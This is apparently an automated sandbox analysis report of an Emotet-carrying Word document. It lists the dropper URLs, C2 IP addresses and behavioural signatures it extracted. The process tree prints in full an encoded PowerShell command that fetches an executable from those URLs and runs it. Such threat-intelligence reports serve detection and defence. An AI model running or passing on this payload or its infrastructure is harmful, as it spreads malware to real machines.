Analysis

  • max time kernel
    24s
  • resource
    win10v191014
  • submitted
    29-01-2020 07:35

General

  • Target

    9315592a616c4d5172612b91772e50ac609916d92636e1d36ca4db17102ea511.doc

  • Sample

    200129-vfrcgjd3bx

  • SHA256

    9315592a616c4d5172612b91772e50ac609916d92636e1d36ca4db17102ea511

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://blinkro.eu/wp-content/hMDRkCt/

exe.dropper

http://blasmontavez.com/wp-includes/ep0/

exe.dropper

http://luxuryflower.net/wp-content/cgNoUgY/

exe.dropper

http://gostareh.org/old/f7tSe81/

exe.dropper

http://hindwalkerphoto.com/wp-content/v1d8mo/

Extracted

Family

emotet

C2

108.190.109.107:80

174.83.116.77:80

125.207.127.86:80

74.208.45.104:8080

136.243.205.112:7080

23.92.16.164:8080

45.55.65.123:8080

24.164.79.147:8080

88.249.120.205:80

91.73.197.90:80

60.250.78.22:443

90.69.145.210:8080

101.187.237.217:80

85.152.174.56:80

190.117.226.104:80

190.12.119.180:443

186.86.247.171:443

47.153.183.211:80

37.187.72.193:8080

181.13.24.82:80

rsa_pubkey.plain

Signatures

  • Process spawned unexpected child process 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 1 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9315592a616c4d5172612b91772e50ac609916d92636e1d36ca4db17102ea511.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4924
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
    PoWERsheLL -e JABRAGsAdwBtAHAAaQBsAHUAawA9ACcAWgBkAGoAZQBlAG8AeABtAHkAJwA7ACQATwBtAHYAcABxAGQAdgB0AHMAbwBqACAAPQAgACcAMwAxADYAJwA7ACQAVABqAG0AaQBhAGkAcwBxAGIAYQBsAD0AJwBSAGQAdAB3AGYAdABlAHoAbgBwAG4AdQAnADsAJABGAGwAagByAHQAZABuAHAAaQBlAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAG0AdgBwAHEAZAB2AHQAcwBvAGoAKwAnAC4AZQB4AGUAJwA7ACQARQByAHcAawB5AGwAeABjAGMAYwB6AD0AJwBSAHcAZwB6AHIAZwBtAG4AbABkACcAOwAkAEwAdwB1AGEAeABiAGwAbAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAEUAQgBDAEwAaQBlAE4AdAA7ACQAUwB0AGgAdwB2AHMAdABqAHYAYwA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAaQBuAGsAcgBvAC4AZQB1AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGgATQBEAFIAawBDAHQALwAqAGgAdAB0AHAAOgAvAC8AYgBsAGEAcwBtAG8AbgB0AGEAdgBlAHoALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGUAcAAwAC8AKgBoAHQAdABwADoALwAvAGwAdQB4AHUAcgB5AGYAbABvAHcAZQByAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AYwBnAE4AbwBVAGcAWQAvACoAaAB0AHQAcAA6AC8ALwBnAG8AcwB0AGEAcgBlAGgALgBvAHIAZwAvAG8AbABkAC8AZgA3AHQAUwBlADgAMQAvACoAaAB0AHQAcAA6AC8ALwBoAGkAbgBkAHcAYQBsAGsAZQByAHAAaABvAHQAbwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHYAMQBkADgAbQBvAC8AJwAuACIAcwBwAGwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABPAGIAbwBnAHUAegBvAGsAdABvAHoAZQA9ACcAUgB1AG8AYQByAHcAdQBoAG0AYwBoACcAOwBmAG8AcgBlAGEAYwBoACgAJABFAGYAcQBwAHYAdQBhAHAAegBkAGwAdgAgAGkAbgAgACQAUwB0AGgAdwB2AHMAdABqAHYAYwApAHsAdAByAHkAewAkAEwAdwB1AGEAeABiAGwAbAAuACIAZABvAHcAbgBMAE8AQQBgAEQARgBpAGAATABFACIAKAAkAEUAZgBxAHAAdgB1AGEAcAB6AGQAbAB2ACwAIAAkAEYAbABqAHIAdABkAG4AcABpAGUAKQA7ACQATgBkAGIAdABuAGcAcQBqAGoAagB3AGgAPQAnAEEAcwBkAHgAYgBpAGUAcAByAHkAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABGAGwAagByAHQAZABuAHAAaQBlACkALgAiAGwARQBOAGAARwBUAEgAIgAgAC0AZwBlACAAMgA3ADcANQA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAHIAZQBBAGAAVABlACIAKAAkAEYAbABqAHIAdABkAG4AcABpAGUAKQA7ACQAWgBoAG8AbAB6AGYAZQBiAGcAcwB2AG0APQAnAEUAaABsAHMAdABvAG0AdQBwAGoAZgBmAGcAJwA7AGIAcgBlAGEAawA7ACQATQBjAGoAYQBtAHIAYwB2AHgAdwBjAHkAagA9ACcASQBrAGQAagB6AGkAZwBnAHEAeQBoAGUAcgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAHkAbQBkAHUAcQBtAGwAbAA9ACcATQBuAHYAcQBwAGMAYQBxACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:3736
  • C:\Users\Admin\316.exe
    C:\Users\Admin\316.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    PID:4680
    • C:\Users\Admin\316.exe
      --489db656
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Suspicious use of SetWindowsHookEx
      PID:4348

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\316.exe

  • C:\Users\Admin\316.exe

  • C:\Users\Admin\316.exe

  • memory/4348-11-0x00000000020E0000-0x00000000020F5000-memory.dmp

    Filesize

    84KB

  • memory/4348-12-0x0000000000400000-0x0000000000452000-memory.dmp

    Filesize

    328KB

  • memory/4680-9-0x00000000021A0000-0x00000000021B5000-memory.dmp

    Filesize

    84KB

  • memory/4924-0-0x000001E7A3089000-0x000001E7A308C000-memory.dmp

    Filesize

    12KB